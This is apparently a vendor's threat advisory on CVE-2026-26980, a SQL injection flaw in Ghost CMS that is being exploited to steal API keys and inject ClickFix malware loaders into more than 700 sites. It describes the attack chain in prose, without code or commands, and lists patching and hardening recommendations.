Attackers are exploiting a critical vulnerability, tracked as CVE-2026-26980, in the Ghost Content Management System (CMS) to compromise more than 700 legitimate websites. Read this Cybersecurity Threat Advisory to reduce risk for you and your clients.
What is the threat?
CVE-2026-26980 is a critical SQL injection vulnerability in Ghost CMS’s Content API, with a CVSS score of 9.4. Attackers are exploiting this flaw to extract Admin API keys and inject malicious JavaScript into published content, enabling large-scale ClickFix attacks.
Although Ghost patched the issue in version 6.19.1 in February 2026, unpatched systems remain exposed. The injected loader retrieves a flexible second-stage payload that fingerprints visitors and can redirect them, trigger downloads, or display fake Cloudflare CAPTCHA pages.
On trusted domains, attackers trick victims into executing a Windows command that drops DLL loaders, JavaScript droppers, and an Electron-based infostealer (UtilifySetup.exe). Code-signed DLLs further help the malware evade endpoint detection.
Why is it noteworthy?
This incident is significant because it affects Ghost, a widely used open-source CMS with more than 100,000 active deployments, including high-profile organizations such as DuckDuckGo, Harvard, and Oxford.
A critical SQL injection flaw in a platform of this scale allows unauthenticated attackers to compromise large numbers of trusted websites. At least two threat groups are actively exploiting the vulnerability—and competing to implant their own payloads—demonstrating both the severity of the flaw and the speed at which attackers weaponize newly disclosed vulnerabilities.
What is the exposure or risk?
The primary risk is twofold: data compromise and content hijacking. Attackers can exploit the SQL injection flaw to extract sensitive data from Ghost databases, including authentication tokens, user credentials, and Admin API keys. With these keys, they can programmatically alter site content and inject malicious loaders, putting visitors at risk of malware infection and downstream compromise.
More than 700 sites have already been compromised, and many remain unresponsive to notification efforts. This creates ongoing risk for both site operators and users, including reputational damage, loss of trust, and abuse of legitimate domains as malware distribution channels.
What are the recommendations?
Barracuda strongly recommends organizations take the following steps to reduce the risk of exploitation and protect critical infrastructure from this and other similar threats.
- Upgrade Ghost CMS to v6.19.1 or later on all instances.
- Ensure all plugins, themes, and dependencies are updated.
- Regenerate Admin API keys and Content API keys.
- Reset admin and user passwords.
- Invalidate and re-issue tokens / sessions used by Ghost.
- Review posts, pages, and templates for unexpected JavaScript or HTML.
- Inspect Admin/API logs for unusual access, IPs, or activity.
- Look for ClickFix-related or unknown JS loaders embedded in content.
- Restrict database access and use least-privilege DB accounts.
- Limit admin access with VPN, IP allow lists, or strong MFA.
- Disable or lock down unnecessary APIs and integrations.
References
For more in-depth information about the recommendations, please visit the following links:
- https://thehackernews.com/2026/05/ghost-cms-cve-2026-26980-exploited-to.html
- https://www.securityweek.com/ghost-cms-vulnerability-exploited-to-hack-over-700-websites/amp/
- https://cybelangel.com/blog/cve-2026-26980-ghost-cms-flaw/
If you have any questions about this Cybersecurity Threat Advisory, don’t hesitate to get in touch with Barracuda Managed XDR’s Security Operations Center.
